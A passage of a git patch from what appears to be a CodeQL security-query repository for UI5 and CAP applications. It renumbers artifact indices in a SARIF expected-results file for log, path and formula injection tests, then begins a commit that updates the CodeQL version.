"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 222 + "index" : 223 }, "region" : { "startLine" : 17, @@ -47437,7 +21251,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 222 + "index" : 223 }, "region" : { "startLine" : 17, @@ -47455,7 +21269,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 222 + "index" : 223 }, "region" : { "startLine" : 17, @@ -47473,7 +21287,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 222 + "index" : 223 }, "region" : { "startLine" : 23, @@ -47494,7 +21308,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 227 + "index" : 228 }, "region" : { "startLine" : 5, @@ -47545,7 +21359,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 235 + "index" : 236 }, "region" : { "startLine" : 5, @@ -47603,7 +21417,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 235 + "index" : 236 }, "region" : { "startLine" : 5, @@ -47723,6 +21537,133 @@ "text" : "user-provided value" } } ] + }, { + "ruleId" : "js/ui5-log-injection", + "rule" : { + "id" : "js/ui5-log-injection", + "index" : 3, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 171 + }, + "region" : { + "startLine" : 13, + "startColumn" : 38, + "endColumn" : 56 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "fb0b88ea7a3fc8f1:1", + "primaryLocationStartColumnFingerprint" : "21" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 176 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 172 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 171 + }, + "region" : { + "startLine" : 7, + "startColumn" : 23, + "endColumn" : 38 + } + }, + "message" : { + "text" : "{ type: \"int\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 171 + }, + "region" : { + "startLine" : 13, + "startColumn" : 38, + "endColumn" : 56 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 176 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] }, { "ruleId" : "js/ui5-log-injection", "rule" : { @@ -47920,133 +21861,6 @@ "text" : "user-provided value" } } ] - }, { - "ruleId" : "js/ui5-log-injection", - "rule" : { - "id" : "js/ui5-log-injection", - "index" : 3, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 171 - }, - "region" : { - "startLine" : 13, - "startColumn" : 38, - "endColumn" : 56 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "fb0b88ea7a3fc8f1:1", - "primaryLocationStartColumnFingerprint" : "21" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 175 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 172 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 171 - }, - "region" : { - "startLine" : 7, - "startColumn" : 23, - "endColumn" : 38 - } - }, - "message" : { - "text" : "{ type: \"int\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 171 - }, - "region" : { - "startLine" : 13, - "startColumn" : 38, - "endColumn" : 56 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 175 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] }, { "ruleId" : "js/ui5-log-injection", "rule" : { @@ -48315,7 +22129,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 179 + "index" : 180 }, "region" : { "startLine" : 17, @@ -48336,7 +22150,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 184 + "index" : 185 }, "region" : { "startLine" : 5, @@ -48355,7 +22169,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", - "index" : 185 + "index" : 181 }, "region" : { "startLine" : 9, @@ -48373,7 +22187,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 179 + "index" : 180 }, "region" : { "startLine" : 8, @@ -48391,7 +22205,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 179 + "index" : 180 }, "region" : { "startLine" : 15, @@ -48409,7 +22223,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 179 + "index" : 180 }, "region" : { "startLine" : 15, @@ -48427,7 +22241,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 179 + "index" : 180 }, "region" : { "startLine" : 16, @@ -48445,7 +22259,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 179 + "index" : 180 }, "region" : { "startLine" : 16, @@ -48463,7 +22277,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 179 + "index" : 180 }, "region" : { "startLine" : 16, @@ -48481,7 +22295,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 179 + "index" : 180 }, "region" : { "startLine" : 16, @@ -48499,7 +22313,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 179 + "index" : 180 }, "region" : { "startLine" : 17, @@ -48520,7 +22334,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 184 + "index" : 185 }, "region" : { "startLine" : 5, @@ -48550,7 +22364,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", - "index" : 188 + "index" : 189 }, "region" : { "startLine" : 17, @@ -48571,7 +22385,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 192 + "index" : 193 }, "region" : { "startLine" : 6, @@ -48590,7 +22404,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", - "index" : 188 + "index" : 189 }, "region" : { "startLine" : 9, @@ -48608,7 +22422,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", - "index" : 188 + "index" : 189 }, "region" : { "startLine" : 15, @@ -48626,7 +22440,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", - "index" : 188 + "index" : 189 }, "region" : { "startLine" : 15, @@ -48644,7 +22458,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", - "index" : 188 + "index" : 189 }, "region" : { "startLine" : 17, @@ -48665,7 +22479,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 192 + "index" : 193 }, "region" : { "startLine" : 6, @@ -48716,7 +22530,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 204 + "index" : 202 }, "region" : { "startLine" : 5, @@ -48810,7 +22624,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 204 + "index" : 202 }, "region" : { "startLine" : 5, @@ -48861,7 +22675,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 209 + "index" : 210 }, "region" : { "startLine" : 5, @@ -48955,7 +22769,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 209 + "index" : 210 }, "region" : { "startLine" : 5, @@ -49347,7 +23161,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", - "index" : 163 + "index" : 166 }, "region" : { "startLine" : 16, @@ -49368,7 +23182,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 166 + "index" : 167 }, "region" : { "startLine" : 5, @@ -49387,7 +23201,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", - "index" : 163 + "index" : 166 }, "region" : { "startLine" : 10, @@ -49405,7 +23219,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", - "index" : 163 + "index" : 166 }, "region" : { "startLine" : 16, @@ -49426,7 +23240,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 166 + "index" : 167 }, "region" : { "startLine" : 5, @@ -51373,7 +25187,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 103 + "index" : 101 }, "region" : { "startLine" : 9, @@ -51394,7 +25208,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 103 + "index" : 101 }, "region" : { "startLine" : 6, @@ -51412,7 +25226,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 103 + "index" : 101 }, "region" : { "startLine" : 7, @@ -51430,7 +25244,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 103 + "index" : 101 }, "region" : { "startLine" : 7, @@ -51448,7 +25262,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 103 + "index" : 101 }, "region" : { "startLine" : 7, @@ -51466,7 +25280,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 103 + "index" : 101 }, "region" : { "startLine" : 7, @@ -51484,7 +25298,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 103 + "index" : 101 }, "region" : { "startLine" : 7, @@ -51502,7 +25316,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 103 + "index" : 101 }, "region" : { "startLine" : 9, @@ -51523,7 +25337,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 103 + "index" : 101 }, "region" : { "startLine" : 6, @@ -51552,7 +25366,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 108 + "index" : 109 }, "region" : { "startLine" : 9, @@ -51573,7 +25387,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", - "index" : 106 + "index" : 107 }, "region" : { "startLine" : 6, @@ -51591,7 +25405,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", - "index" : 106 + "index" : 107 }, "region" : { "startLine" : 7, @@ -51609,7 +25423,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", - "index" : 106 + "index" : 107 }, "region" : { "startLine" : 7, @@ -51627,7 +25441,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", - "index" : 106 + "index" : 107 }, "region" : { "startLine" : 7, @@ -51645,7 +25459,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", - "index" : 106 + "index" : 107 }, "region" : { "startLine" : 7, @@ -51663,7 +25477,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", - "index" : 106 + "index" : 107 }, "region" : { "startLine" : 7, @@ -51681,7 +25495,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", - "index" : 106 + "index" : 107 }, "region" : { "startLine" : 9, @@ -51699,7 +25513,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", - "index" : 106 + "index" : 107 }, "region" : { "startLine" : 9, @@ -51717,7 +25531,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 108 + "index" : 109 }, "region" : { "startLine" : 6, @@ -51735,7 +25549,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 108 + "index" : 109 }, "region" : { "startLine" : 7, @@ -51753,7 +25567,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 108 + "index" : 109 }, "region" : { "startLine" : 7, @@ -51771,7 +25585,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 108 + "index" : 109 }, "region" : { "startLine" : 7, @@ -51789,7 +25603,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 108 + "index" : 109 }, "region" : { "startLine" : 7, @@ -51807,7 +25621,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 108 + "index" : 109 }, "region" : { "startLine" : 7, @@ -51825,7 +25639,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 108 + "index" : 109 }, "region" : { "startLine" : 9, @@ -51846,7 +25660,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", - "index" : 106 + "index" : 107 }, "region" : { "startLine" : 6, @@ -51875,7 +25689,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 122 + "index" : 115 }, "region" : { "startLine" : 9, @@ -51896,7 +25710,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", - "index" : 114 + "index" : 113 }, "region" : { "startLine" : 6, @@ -51914,7 +25728,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", - "index" : 114 + "index" : 113 }, "region" : { "startLine" : 7, @@ -51932,7 +25746,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", - "index" : 114 + "index" : 113 }, "region" : { "startLine" : 7, @@ -51950,7 +25764,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", - "index" : 114 + "index" : 113 }, "region" : { "startLine" : 7, @@ -51968,7 +25782,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", - "index" : 114 + "index" : 113 }, "region" : { "startLine" : 7, @@ -51986,7 +25800,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", - "index" : 114 + "index" : 113 }, "region" : { "startLine" : 7, @@ -52004,7 +25818,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", - "index" : 114 + "index" : 113 }, "region" : { "startLine" : 9, @@ -52022,7 +25836,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", - "index" : 114 + "index" : 113 }, "region" : { "startLine" : 9, @@ -52040,7 +25854,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 122 + "index" : 115 }, "region" : { "startLine" : 6, @@ -52058,7 +25872,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 122 + "index" : 115 }, "region" : { "startLine" : 7, @@ -52076,7 +25890,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 122 + "index" : 115 }, "region" : { "startLine" : 7, @@ -52094,7 +25908,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 122 + "index" : 115 }, "region" : { "startLine" : 7, @@ -52112,7 +25926,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 122 + "index" : 115 }, "region" : { "startLine" : 7, @@ -52130,7 +25944,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 122 + "index" : 115 }, "region" : { "startLine" : 7, @@ -52148,7 +25962,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 122 + "index" : 115 }, "region" : { "startLine" : 9, @@ -52170,7 +25984,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 122 + "index" : 115 }, "region" : { "startLine" : 6, @@ -52188,7 +26002,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 122 + "index" : 115 }, "region" : { "startLine" : 7, @@ -52206,7 +26020,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 122 + "index" : 115 }, "region" : { "startLine" : 7, @@ -52224,7 +26038,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 122 + "index" : 115 }, "region" : { "startLine" : 7, @@ -52242,7 +26056,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 122 + "index" : 115 }, "region" : { "startLine" : 7, @@ -52260,7 +26074,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 122 + "index" : 115 }, "region" : { "startLine" : 7, @@ -52278,7 +26092,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 122 + "index" : 115 }, "region" : { "startLine" : 9, @@ -52299,7 +26113,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", - "index" : 114 + "index" : 113 }, "region" : { "startLine" : 6, @@ -52316,7 +26130,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 122 + "index" : 115 }, "region" : { "startLine" : 6, @@ -52370,4 +26184,4 @@ "semmle.formatSpecifier" : "sarif-latest" } } ] -} +} \ No newline at end of file From b569d0fa7bcdea7126d0c3d0e32586739fb49b67 Mon Sep 17 00:00:00 2001 From: Mauro Baluda Date: Wed, 22 May 2024 20:28:03 +0200 Subject: [PATCH 11/15] Update CodeQL to 2.17.3 --- .../frameworks/ui5/RemoteFlowSources.qll | 2 +- .../javascript/frameworks/ui5/UI5View.qll | 16 ++++++++-------- qlt.conf.json | 6 +++--- 3 files changed, 12 insertions(+), 12 deletions(-) diff --git a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/RemoteFlowSources.qll b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/RemoteFlowSources.qll index ccfd09f1d..6669b8ffb 100644 --- a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/RemoteFlowSources.qll +++ b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/RemoteFlowSources.qll @@ -7,7 +7,7 @@ private class DataFromRemoteControlReference extends RemoteFlowSource, MethodCal DataFromRemoteControlReference() { exists(UI5Control sourceControl, string typeAlias, ControlReference controlReference | ApiGraphModelsExtensions::typeModel(typeAlias, sourceControl.getImportPath(), _) and - ApiGraphModelsExtensions::sourceModel(typeAlias, _, "remote") and + ApiGraphModelsExtensions::sourceModel(typeAlias, _, "remote", _) and sourceControl.getAReference() = controlReference and controlReference.flowsTo(this.getReceiver()) and this.getMethodName() = "getValue" diff --git 